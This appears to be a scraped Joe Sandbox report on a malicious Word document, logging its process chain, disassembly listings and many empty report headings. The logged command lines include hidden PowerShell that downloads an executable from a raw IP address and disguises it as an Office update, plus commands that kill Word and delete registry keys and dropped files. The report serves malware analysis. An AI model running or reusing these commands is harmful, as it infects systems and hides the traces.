Imagebase:	0x778a0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3636 Parent PID: 3448

General

Start time:	22:18:11
Start date:	12/09/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe;
Imagebase:	0x778a0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: taskkill.exe PID: 3784 Parent PID: 3636

General

Start time:	22:18:23
Start date:	12/09/2017
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\taskkill.exe' /f /im winword.exe
Imagebase:	0x75760000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3828 Parent PID: 3448

General

Start time:	22:18:26
Start date:	12/09/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Imagebase:	0x75b30000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: powershell.exe PID: 3840 Parent PID: 3448

General

Start time:	22:18:27
Start date:	12/09/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs
Imagebase:	0x745c0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cmd.exe PID: 3860 Parent PID: 3448

General

Start time:	22:18:27
Start date:	12/09/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' '/c start /MAX '' winword /q /mFile3
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3888 Parent PID: 3448

General

Start time:	22:18:27
Start date:	12/09/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');
Imagebase:	0x778a0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: WINWORD.EXE PID: 3956 Parent PID: 3860

General

Start time:	22:18:30
Start date:	12/09/2017
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	winword /q /mFile3
Imagebase:	0x778a0000
File size:	1422168 bytes
MD5 hash:	113371C5AC72FCE072F707C55E7845B9
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: OfficeUpdte-KB9748956.exe PID: 2228 Parent PID: 3448

General

Start time:	22:19:18
Start date:	12/09/2017
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe'
Imagebase:	0x75860000
File size:	1383424 bytes
MD5 hash:	A7B990D5F57B244DD17E9A937A41E7F5
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: OfficeUpdte-KB9748956.exe PID: 2228 Parent PID: 3448

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.9%
Total number of Nodes:	71
Total number of Limit Nodes:	11

Executed Functions

Function 00805280, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

NtReadFile.NTDLL(007C1753), ref: 0080528A

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Non-executed Functions

Function 008912FF, Relevance: 3.4, APIs: 2, Instructions: 435

APIs

__alldiv.INT64 ref: 0089161C

Part of subcall function 008051C0: NtQuerySystemInformation.NTDLL(007C4D73,00000000,?,0000002C,00000000,?,?,?,?,?,?,778F17E0,00000068,00820191,?,?), ref: 008051CA

Part of subcall function 00890E1B: _DnssrvDeleteRecordSet@16.DNSRPC ref: 00890E8B

__alldiv.INT64 ref: 00891632

Part of subcall function 00805280: NtReadFile.NTDLL(007C1753), ref: 0080528A

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007CAAB8, Relevance: 1.4, Strings: 1, Instructions: 172

Strings

{, xrefs: 00838B61

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007D2B47, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 270

APIs

__Stoull.NTSTC_LIBCMT ref: 007D2B24
__Stoull.NTSTC_LIBCMT ref: 007D2C92
__Stoull.NTSTC_LIBCMT ref: 00837772

Part of subcall function 007D2CEA: __cftof.LIBCMT ref: 007D2CFA

__Stoull.NTSTC_LIBCMT ref: 00837832

Strings

:, xrefs: 007D2ACF
., xrefs: 00837721
:, xrefs: 007D2BDB

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 0082C1EB, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 497

Strings

0, xrefs: 0082C215
@, xrefs: 0082C460
athan, xrefs: 007E0FC9, 007E324E, 007E326D
Actx , xrefs: 007E3285, 0083678B, 00839192, 00845AD6

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007CDFD8, Relevance: 9.2, APIs: 6, Instructions: 192

APIs

___swprintf_l.LIBCMT ref: 007CB629
___swprintf_l.LIBCMT ref: 007CE074
___swprintf_l.LIBCMT ref: 007CE099
___swprintf_l.LIBCMT ref: 007CE115
___swprintf_l.LIBCMT ref: 0084E05E
___swprintf_l.LIBCMT ref: 0084E09A

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 008216AE, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 266

APIs

Part of subcall function 0085E7E2: StringCbPrintfA.CLFSMGMT ref: 0085E86F

_DnsPrint_RawOctets@24.DNSLIB ref: 0083C59B

Strings

$, xrefs: 007D0AA0
athan, xrefs: 00824F53
$, xrefs: 00824EFF

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007CDABF, Relevance: 6.2, APIs: 4, Instructions: 247

APIs

__Stoull.NTSTC_LIBCMT ref: 007C1E1D

Part of subcall function 007D0DA9: __cftof.LIBCMT ref: 007D0DB9

__Stoull.NTSTC_LIBCMT ref: 007CB6B5
__Stoull.NTSTC_LIBCMT ref: 007CD991
__Stoull.NTSTC_LIBCMT ref: 007D3017

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007C54BE, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246

APIs

__aulldvrm.INT64 ref: 007C5561

Strings

0, xrefs: 008517A6
$, xrefs: 007C54EE

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Function 007D762C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98

Strings

>, xrefs: 007D7A57
, xrefs: 007D76B0

Memory Dump Source

Source File: 00000018.00000002.491865517.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000018.00000002.491899526.00900000.00000040.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7c0000_OfficeUpdte-KB9748956.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Exploits:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerabilities:

Networking:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 3284 Parent PID: 2848

General

Analysis Process: csc.exe PID: 3368 Parent PID: 3284

General

Analysis Process: cvtres.exe PID: 3392 Parent PID: 3368

General

Analysis Process: mshta.exe PID: 3448 Parent PID: 3284